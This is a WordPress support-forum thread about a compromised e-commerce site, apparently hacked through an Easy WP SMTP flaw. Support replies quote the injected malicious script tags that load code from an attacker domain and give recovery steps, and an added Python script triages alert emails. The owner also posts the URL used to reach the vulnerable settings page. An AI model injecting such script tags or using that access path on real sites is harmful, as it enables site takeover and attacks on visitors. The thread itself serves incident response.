• Resolved winner singh

    (@winner-singh)


    Hi,

    I want to talk about my website, which is an e-commerce website.

    Yesterday night I got these emails from the website:

    1. 9:56 pm, March 19 - New user registration on your site Pizza Home:

       Username: devidpentesting99
       Email: devidpentesting@yandex.ru

    2. Then I got the email:
       Password changed for user: devidpentesting99 at 4:05 am

    3. At 5:30 AM, March 20:
       This email was sent from your website "Pizza Home" by the Wordfence plugin at Wednesday 20th of March 2019 at 01:00:36 PM
       The Wordfence administrative URL for this site is: https://www.pizzahome.co.nz/wp-admin/admin.php?page=Wordfence
       A user with username "devidpentesting99" who has administrator access signed in to your WordPress site.
       User IP: 185.212.131.46
       User hostname: jacksonblue1.ptr1.ru
       User location: Netherlands

    4. At 6:58 AM, March 20:
       This email was sent from your website "Pizza Home" by the Wordfence plugin at Wednesday 20th of March 2019 at 02:28:26 PM
       The Wordfence administrative URL for this site is: https://getmyfreetraffic.com/n90sab35473/wp-admin/admin.php?page=Wordfence
       A user with username "devidpentesting99" who has administrator access signed in to your WordPress site.
       User IP: 185.212.131.45
       User hostname: jacksonblue.ptr1.ru
       User location: Netherlands

    And then my site was hacked; it is redirecting to some blog. Please tell me how someone created himself as an administrator. Yes, it is a shopping cart: the user can create an account, and the user can change the password.
    But how did someone do this? What type of hacking is this?! My hosting company is also investigating this. I have been using Wordfence for two years and this kind of hack has never happened. Suggest to me how I can be careful next time.

    • This topic was modified 8 months, 2 weeks ago by winner singh.
Viewing 6 replies - 1 through 6 (of 6 total)
  • Plugin Support wfdave

    (@wfdave)

    Hi @winner-singh,

    I just visited your site at https://www.pizzahome.co.nz/.

    There was a malicious script attached to the top of the page:

    <script type='text/javascript' async src='https://setforspecialdomain.com/in2herg42t2?type=in2&frm=scr&'></script><script type='text/javascript' async src='https://setforspecialdomain.com/in2herg42t2?type=in2&frm=scr&'></script><script type='text/javascript' async src='https://setforspecialdomain.com/in2herg42t2?type=in2&frm=scr&'></script><script type='text/javascript' async src='https://setforspecialdomain.com/in2herg42t2?type=in2&frm=scr&'></script>

    Can you run this query to reset the siteurl and home?

    UPDATE wp_options SET option_value="https://www.pizzahome.co.nz" WHERE option_name = "siteurl" OR option_name = "home";

    Please also open up /index.php and see if <script type='text/javascript'... was added to the top.

    Dave

    @wfdave Thank you for the reply. Yes, I saw that code in the index.php file; I removed it, but the site is still not working. What other files do I need to check? My hosting company replied to me that:

    “It appears that you’re running into a
    recently-discovered exploit in the Easy WP SMTP plugin”

    • This reply was modified 8 months, 2 weeks ago by winner singh.
    Plugin Support wfdave

    (@wfdave)

    Hi again,

    Did you run the query that should reset your WordPress options back to normal?

    Easy WP SMTP recently fixed a critical security flaw which allowed an attacker to change the data within wp_options.

    I refreshed your site and it seems to be fine.

    Dave

    @wfdave Hi again. By the grace of God, I found a backup, which was actually online in the backup folder in a rar file, via the BackUpWordPress plugin; it automatically generated the backup on March 16, and it saved my life.

    Now I updated the Easy WP SMTP plugin, but please tell me how the hacker added the JavaScript code to the index file and other things, and give suggestions on what factors I need to be careful about. And yes, Wordfence also sent me an email early in the morning that someone had logged in as an administrator. Thanks, Wordfence, too.

    So in future, if something like this happens, what should I do?
    Should I set the permissions via FTP to these files:

    wp-content 755
    wp-includes 644
    All .php files 644
    All folders 755
    wp-config.php 444
    index.php 444

    • This reply was modified 8 months, 2 weeks ago by winner singh.

    @macnetwork @tvoltz On the support forum of the SMTP plugin, they replied that they solved the vulnerability; users need to update the plugin. Here was the trick used by the hacker:
    https://www.domain.com/wp-login.php?redirect_to=https://www.domain.com/wp-admin/options-general.php?page=swpsmtp_settings&reauth=1
    HTTP 200 OK

    So it goes directly to the SMTP page where they found the vulnerability. I think someone from Wordfence should make a video of this, so that all of us users will be careful next time, or suggest another plugin for SMTP.

    Plugin Support wfdave

    (@wfdave)

    Hi @winner-singh,

    The attacker was able to change two vital keys within the database.

    They changed siteurl and homeurl, which affected where all the links on your site would point to.

    Dave
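An added example (mine, not Wordfence's or the plugin's code) that turns the two points in this thread into a triage check: the administrative URL in the second Wordfence alert quoted in the original post switched to a foreign domain, which is exactly what rewritten siteurl and home options look like from the mailbox. It assumes the site's real hostname and an allowlist of legitimate administrators (the "owner" account is made up).

```python
import re
from urllib.parse import urlparse

# Constructed sample built from the two Wordfence alerts quoted in the thread.
SAMPLE_ALERTS = """
This email was sent from your website "Pizza Home" by the Wordfence plugin at Wednesday 20th of March 2019 at 01:00:36 PM
The Wordfence administrative URL for this site is: https://www.pizzahome.co.nz/wp-admin/admin.php?page=Wordfence
A user with username "devidpentesting99" who has administrator access signed in to your WordPress site.
User IP: 185.212.131.46
User hostname: jacksonblue1.ptr1.ru
User location: Netherlands

This email was sent from your website "Pizza Home" by the Wordfence plugin at Wednesday 20th of March 2019 at 02:28:26 PM
The Wordfence administrative URL for this site is: https://getmyfreetraffic.com/n90sab35473/wp-admin/admin.php?page=Wordfence
A user with username "devidpentesting99" who has administrator access signed in to your WordPress site.
User IP: 185.212.131.45
User hostname: jacksonblue.ptr1.ru
User location: Netherlands
"""

# One alert = admin URL line, sign-in line, IP line, hostname line.
ALERT_RE = re.compile(
    r'administrative URL for this site is: (?P<url>\S+)\s*\n'
    r'A user with username "(?P<user>[^"]+)" who has administrator access[^\n]*\n'
    r'User IP: (?P<ip>\S+)\s*\nUser hostname: (?P<host>\S+)')

def parse_alerts(text):
    """Return one dict per administrator sign-in alert found in the mailbox text."""
    return [m.groupdict() for m in ALERT_RE.finditer(text)]

def triage(alerts, expected_host, known_admins):
    """Flag alerts whose admin URL host drifted from the real site (symptom of a
    rewritten siteurl/home) or whose administrator is not on the allowlist."""
    findings = []
    for a in alerts:
        reasons = []
        admin_host = urlparse(a["url"]).hostname
        if admin_host != expected_host:
            reasons.append(f"admin URL host {admin_host!r} != {expected_host!r}: check siteurl/home in wp_options")
        if a["user"] not in known_admins:
            reasons.append(f"unexpected administrator {a['user']!r}")
        if reasons:
            findings.append((a["ip"], a["host"], reasons))
    return findings

if __name__ == "__main__":
    # "owner" is an assumed allowlist entry, not an account from the thread.
    for ip, host, reasons in triage(parse_alerts(SAMPLE_ALERTS), "www.pizzahome.co.nz", {"owner"}):
        print(f"{ip} ({host}): " + "; ".join(reasons))
```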

  • The topic ‘Site compromised’ is closed to new replies.